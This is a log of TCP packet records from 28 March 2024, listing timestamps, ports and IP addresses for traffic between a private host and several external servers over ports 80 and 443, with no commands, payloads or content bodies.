Mar 28, 2024 09:14:59.293088913 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.293118954 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.293126106 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.293135881 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.293147087 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.293157101 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.293175936 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.293190956 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.293211937 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.293222904 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.293241978 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.293260098 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.293262959 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.293294907 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.293303967 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.293327093 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.302897930 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.302923918 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.302970886 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.306824923 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.306852102 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.306895018 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.309149027 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:59.309225082 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:59.309247017 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:59.309310913 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:59.309350967 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:59.315283060 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.315308094 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.315359116 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.320674896 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.320697069 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.320743084 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.327872992 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.327897072 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.327951908 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.334489107 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.334513903 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.334558010 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.339503050 CET	80	49756	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.339510918 CET	80	49763	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.339597940 CET	49763	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.340081930 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.340097904 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.340157986 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.340157986 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.341245890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.341259003 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.341269970 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.341288090 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.341304064 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.341336966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.341336966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.342719078 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.342730999 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.342753887 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.342797995 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.342797995 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.342813969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.342825890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.342858076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.342871904 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.342885017 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.342899084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.342966080 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.343450069 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.343570948 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.343575954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.343594074 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.343700886 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.343976021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.343988895 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344029903 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.344047070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344060898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.344069958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344118118 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.344495058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344540119 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.344628096 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344671965 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344713926 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.344734907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344758034 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344779968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.344780922 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344822884 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.344822884 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.344825983 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.344873905 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.345386982 CET	80	49764	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.345453024 CET	49764	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.348356009 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.348368883 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.348421097 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.349684954 CET	80	49757	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.352483034 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.352498055 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.352551937 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.358540058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358562946 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358576059 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358588934 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358602047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358614922 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358639002 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.358639002 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.358675957 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.358854055 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358920097 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.358927011 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358939886 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358978033 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.358989954 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.358989954 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.358994961 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.359006882 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.359030962 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.359030962 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.359038115 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.359074116 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.359074116 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.359796047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.359849930 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.359863043 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.359894991 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.359906912 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.360133886 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.360146046 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.360167027 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.360179901 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.360189915 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.360189915 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.360235929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361112118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361218929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361232996 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361274004 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361287117 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361298084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361304998 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361330986 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361330986 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361368895 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361376047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361387968 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361639977 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361668110 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361680984 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361692905 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361705065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361741066 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361752033 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361763000 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361785889 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361807108 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.361834049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.361870050 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.362149000 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.362162113 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.362195969 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.362227917 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.362572908 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.362617016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.362642050 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.362677097 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.362699986 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.362710953 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.362739086 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.362754107 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.362771988 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.362776041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.362823963 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.362823963 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.362831116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.363428116 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.363934040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.363945961 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.363957882 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.363992929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.363992929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.364005089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364020109 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.364028931 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364052057 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.364077091 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364099026 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.364128113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.364514112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364531040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364543915 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364589930 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.364589930 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.364924908 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364937067 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364974022 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.364979982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.364991903 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.365032911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.365041971 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.365048885 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.365072012 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.365094900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.365127087 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.365127087 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.365144968 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.365175009 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.365191936 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.365207911 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.365689993 CET	80	49755	130.164.189.20	192.168.2.4
Mar 28, 2024 09:14:59.365828991 CET	49763	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.366225958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366238117 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366301060 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366317987 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366338015 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.366338968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.366353035 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366384029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.366385937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366399050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366421938 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.366452932 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.366543055 CET	49764	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.366875887 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366889000 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366899967 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.366972923 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.366997957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.367032051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.367046118 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.367062092 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.367094994 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.367094994 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.367110968 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.367279053 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.367958069 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.367976904 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.367995977 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.368007898 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.368042946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.368055105 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.368088961 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.368105888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.368105888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.368118048 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.368159056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.368159056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.368374109 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:59.368392944 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:59.369447947 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369467020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369510889 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369534969 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369535923 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369549990 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369563103 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369579077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369595051 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369607925 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369620085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369649887 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369795084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369844913 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369898081 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369910002 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369911909 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369956017 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369956970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.369960070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.369991064 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.370002031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.370033979 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.370043039 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.370074034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.370090961 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.370810986 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.371011972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.371023893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.371047020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.371057987 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.371081114 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.371089935 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.371134043 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.371144056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.371232033 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.371896982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.371953964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.372051001 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.372107983 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.372121096 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.372149944 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.372149944 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.372190952 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.372204065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.372205973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.372215986 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.372250080 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.372278929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.372311115 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.373704910 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.375766993 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.375787973 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.375799894 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.375840902 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.375860929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.375860929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.375888109 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.375921965 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.375921965 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.376152992 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.376166105 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.376194954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.376209021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.376230955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.376235962 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.376247883 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.376266956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.376279116 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.376281023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.376319885 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.376323938 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.376323938 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.377027035 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.377087116 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.377249002 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.377285957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.377325058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.377361059 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.377367973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.377367973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.377409935 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.377433062 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.377456903 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.377456903 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.377494097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.377646923 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.377800941 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378298044 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378319979 CET	80	49743	104.21.22.54	192.168.2.4
